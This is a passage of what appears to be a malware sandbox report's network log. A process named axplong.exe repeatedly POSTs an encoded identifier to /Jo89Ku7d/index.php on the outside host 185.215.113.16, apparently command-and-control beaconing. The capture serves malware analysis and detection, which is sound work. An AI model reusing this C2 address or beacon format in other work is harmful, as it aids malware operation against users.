                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:14.294347048 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:14 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    10192.168.2.453663185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:14.412811995 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:15.113159895 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:14 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:15.114578009 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:15.575911045 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:15 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0
                    Sep 27, 2024 08:41:15.577275991 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:15 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    11192.168.2.453664185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:15.693214893 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:16.397417068 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:16 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:16.398504972 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:16.854346991 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:16 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0
                    Sep 27, 2024 08:41:16.854542971 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:16 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    12192.168.2.453665185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:16.974572897 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:17.665976048 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:17 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:17.670783043 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:17.893939018 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:17 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    13192.168.2.453666185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:18.006336927 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:18.696949005 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:18 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:18.697839975 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:19.199841976 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:18 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0
                    Sep 27, 2024 08:41:19.200320005 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:18 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    14192.168.2.453667185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:19.318588018 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:20.018517971 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:19 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:20.019439936 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:20.244077921 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:20 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    15192.168.2.453668185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:20.365197897 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:21.063872099 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:20 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:21.066653013 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:21.291726112 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:21 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    16192.168.2.453669185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:21.411881924 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:22.145788908 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:22 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:22.146595955 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:22.372174025 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:22 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    17192.168.2.453670185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:22.490197897 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:23.181474924 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:23 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:23.182704926 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:23.406193972 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:23 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    18192.168.2.453671185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:23.522094011 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:24.213078976 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:24 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:24.214070082 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:24.438210964 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:24 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    19192.168.2.453672185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:24.553843975 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:25.244494915 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:25 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:25.245512009 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:25.468374968 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:25 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    20192.168.2.453673185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:25.583973885 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:26.276273966 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:26 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:26.280642986 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:26.526397943 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:26 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    21192.168.2.453674185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:26.646678925 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:27.350527048 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:27 GMT
